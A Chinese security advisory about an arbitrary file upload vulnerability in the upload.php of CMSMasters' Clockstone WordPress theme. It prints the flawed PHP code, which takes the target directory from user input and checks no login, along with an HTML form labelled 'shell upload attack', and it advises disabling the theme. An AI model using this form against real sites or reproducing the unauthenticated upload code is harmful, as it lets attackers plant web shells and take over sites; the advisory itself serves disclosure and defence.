zoukankan      html  css  js  c++  java
  • WordPress 多个CMSMasters主题'upload.php'任意文件上传漏洞

    SSV-AppDir: WordPress漏洞
    发布时间: 2012-12-19 (GMT+0800)

    漏洞版本:

    cmsmasters Clockstone

    漏洞描述:

    BUGTRAQ  ID: 56988
    Clockstone是Wordpress的终极主题,一个单一的主题内集合了众多功能。
    WordPress的Clockstone主题和其他主题存在文件上传漏洞。存在该漏洞的原因是由于问题代码对已登录的用户没有进行身份验证操作。攻击者可通过上传任意文件到受害者站点,进而获取站点的访问权限。
    
    主题内有漏洞的代码:
    <?php
       if ($_POST['url']){ $uploaddir = $_POST['url']; }
       $first_filename = $_FILES['uploadfile']['name'];
       $filename = md5($first_filename);
       $ext = substr($first_filename, 1 + strrpos($first_filename, '.'));
       $file = $uploaddir . basename($filename.'.'.$ext);
       if (move_uploaded_file($_FILES['uploadfile']['tmp_name'], $file)){
           echo basename($filename.'.'.$ext);
       } else {
           echo 'error';
       }
    ?>

     <* 参考

    测试方法:

    程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!
    Shell upload attack:<br />
       <form enctype="multipart/form-data" action="http://www.examplesite.com/wp-content/themes/clockstone/theme/functions/upload.php" method="post">
       <input type="text" name="url" value="./" /><br />
       Please choose a file: <input name="uploadfile" type="file" /><br />
       <input type="submit" value="Upload" />
       </form>

    安全建议:

    临时解决方法:
    
    如果您不能立刻安装补丁或者升级,建议您采取以下措施以降低威胁:
    
    * 禁用CMSMasters主题
    
  • 相关阅读:
    关于JSONP
    使用stylelint对CSS/Sass做代码审查
    关于input的file框onchange事件触发一次失效的新的解决方法
    HTML5 之 FileReader(图片上传)
    document.domain
    window.hostory(浏览器的历史记录)
    事件DOMContentLoaded和load的区别
    JavaScript中---作用域
    关于repaint(重绘)和reflow( 回流)
    bootstrap兼容性问题
  • 原文地址:https://www.cnblogs.com/security4399/p/2836478.html
Copyright © 2011-2022 走看看